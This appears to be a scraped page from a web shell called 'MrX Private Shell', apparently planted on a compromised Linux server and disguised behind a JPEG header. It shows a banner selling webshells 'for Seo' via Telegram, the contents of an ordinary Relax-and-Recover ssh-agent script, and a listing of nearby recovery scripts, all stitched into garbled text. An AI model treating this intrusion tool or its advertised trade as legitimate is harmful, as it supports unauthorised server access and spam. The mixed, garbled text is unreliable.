����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# If available, start ssh-agent so that SSH passphrases must be entered only once during 'rear recover' even with
# multiple ssh invocations (as may be the case when restoring from a network backup server).
#
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
if has_binary ssh-agent && has_binary ssh && grep -iq AddKeysToAgent "$(type -P ssh)" ; then
# Use ssh-agent only if ssh supports the AddKeysToAgent option. Otherwise, we'd have to use ssh-add to
# register keys for repeated use but we don't know which keys might be required during 'rear recover'.
Log "Starting up ssh-agent"
AddExitTask "ssh-agent -k >/dev/null"
eval "$(ssh-agent -s)"
test -d $ROOT_HOME_DIR/.ssh || mkdir -p $ROOT_HOME_DIR/.ssh
echo -e "\nHost *\nAddKeysToAgent yes\n" >> $ROOT_HOME_DIR/.ssh/config
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 002_clean_start.sh | File | 902 B | 0644 |
|
| 005_ssh_agent_start.sh | File | 910 B | 0644 |
|
| 007_set_dmesg_level.sh | File | 2.68 KB | 0644 |
|
| 010_pre_recovery_script.sh | File | 467 B | 0644 |
|